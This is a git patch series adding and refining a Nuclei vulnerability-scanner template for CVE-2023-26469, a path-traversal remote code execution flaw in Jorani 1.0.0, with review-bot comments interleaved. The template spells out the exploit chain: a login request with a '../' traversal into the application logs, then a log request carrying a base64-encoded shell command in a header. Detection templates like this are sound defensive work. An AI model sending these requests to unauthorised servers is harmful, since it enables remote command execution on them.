From a397e12906bf797b8c80b5405d7f610bf1d38008 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Wed, 30 Aug 2023 23:01:52 +0530
Subject: [PATCH 1/2] CVE-2023-26469
---
 http/cves/2023/CVE-2023-26469.yaml | 59 ++++++++++++++++++++++++++++++
 1 file changed, 59 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-26469.yaml
diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml
new file mode 100644
index 0000000000..761afa5189
--- /dev/null
+++ b/http/cves/2023/CVE-2023-26469.yaml
@@ -0,0 +1,59 @@
+id: CVE-2023-26469
+
+info:
+ name: Jorani - Remote Code Execution
+ author: pussycat0x
+ severity: critical
+ description: |
+ Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-26469
+ - https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py
+ metadata:
+ max-request: 3
+ shodan-query: http.title:"jorani"
+ verified: true
+ tags: cve,cve2023,jorani,rce
+
+variables:
+ cmd: "id"
+ payload: ""
+
+http:
+ - raw:
+ - |
+ GET /session/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+
+ - |
+ POST /session/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Content-Type: application/x-www-form-urlencoded
+
+ csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword
+
+ - |
+ GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ X-REQUESTED-WITH: XMLHttpRequest
+ OYHTUCUZITWV: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)'
+
+ extractors:
+ - type: regex
+ part: body_1
+ group: 1
+ internal: true
+ name: csrf
+ regex:
+ - 'name="csrf_test_jorani" value="(.*?)"'
\ No newline at end of file
From 12c478a2c80c0cc3f64f16dbfa6d3fe77faf4b30 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 31 Aug 2023 01:31:43 +0530
Subject: [PATCH 2/2] minor update
---
 http/cves/2023/CVE-2023-26469.yaml | 33 ++++++++++++++++++++----------
 1 file changed, 22 insertions(+), 11 deletions(-)
diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml
index 761afa5189..865706cb4f 100644
--- a/http/cves/2023/CVE-2023-26469.yaml
+++ b/http/cves/2023/CVE-2023-26469.yaml
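Review bot: The `description` under `info` is a sentence fragment — `Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.` — and should read `In Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.` `info` also carries no `remediation` entry, so a responder triaging a hit is left with only the NVD link and a PoC script; a line such as `remediation: Upgrade to a Jorani release that addresses CVE-2023-26469 (see the NVD entry in reference).` gives them an action. The `payload: ""` variable is sent as the `login` form field of the second request, but nothing states what it is expected to hold or why it is empty; a one-line comment above it would save the next reader from guessing.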
@@ -1,7 +1,7 @@ id: CVE-2023-26469 info: - name: Jorani - Remote Code Execution + name: Jorani 1.0.0 - Remote Code Execution author: pussycat0x severity: critical description: | @@ -9,27 +9,34 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-26469 - https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py + - https://github.com/advisories/GHSA-7r9h-9r47-7vjj + - http://packetstormsecurity.com/files/174248/Jorani-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-22 + epss-score: 0.22328 + cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:* metadata: max-request: 3 - shodan-query: http.title:"jorani" + shodan-query: http.favicon.hash:-2032163853 verified: true - tags: cve,cve2023,jorani,rce + tags: cve,cve2023,jorani,rce,packetstorm variables: cmd: "id" - payload: "" + payload: "" + header: "{{to_upper(rand_base(12))}}" http: - raw: - | GET /session/login HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - | POST /session/login HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword 
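Review bot: The `payload` variable appears on both the removed and the added side with identical text, `payload: ""`, so whatever changed there is invisible in this view (presumably trailing whitespace or a character the rendering dropped) and the commit message `minor update` does not say; either the commit message should name the change or the line should be left untouched. The new `header: "{{to_upper(rand_base(12))}}"` introduces a header name that is regenerated on every run and pairs with the `{{header}}:` line in the next hunk, yet nothing records that this is deliberate; `# header name is regenerated on each run (12 random characters, upper-cased)` above it would pin the intent. The `http` raw block this hunk opens continues into the next hunk.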
@@ -37,23 +44,27 @@ http: - | GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate X-REQUESTED-WITH: XMLHttpRequest - OYHTUCUZITWV: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}} + {{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}} cookie-reuse: true matchers-condition: and matchers: - type: regex - part: body + part: body_3 regex: - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)' + - type: status + part: header_3 + status: + - 401 + extractors: - type: regex - part: body_1 + part: body group: 1 internal: true name: csrf regex: - - 'name="csrf_test_jorani" value="(.*?)"' \ No newline at end of file + - 'name="csrf_test_jorani" value="(.*?)"'
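Review bot: With `matchers-condition: and`, the added `status` matcher means a hit now requires the third response both to return 401 and to contain the `uid=...gid=...` output matched on `body_3`, and nothing in the template says why a 401 response is expected to carry that output; a later maintainer could reasonably drop one side of the `and` and silently change what the template reports. A comment above the new matcher, `# the third response is expected to be 401 while still carrying the output matched by the body_3 regex; do not relax the and`, would record the intent. Whether a `status` matcher honours `part: header_3` I cannot confirm from this hunk; if it does not, the 401 check applies to whichever response the engine defaults to rather than the third. The `raw` request list this hunk continues starts in the previous hunk.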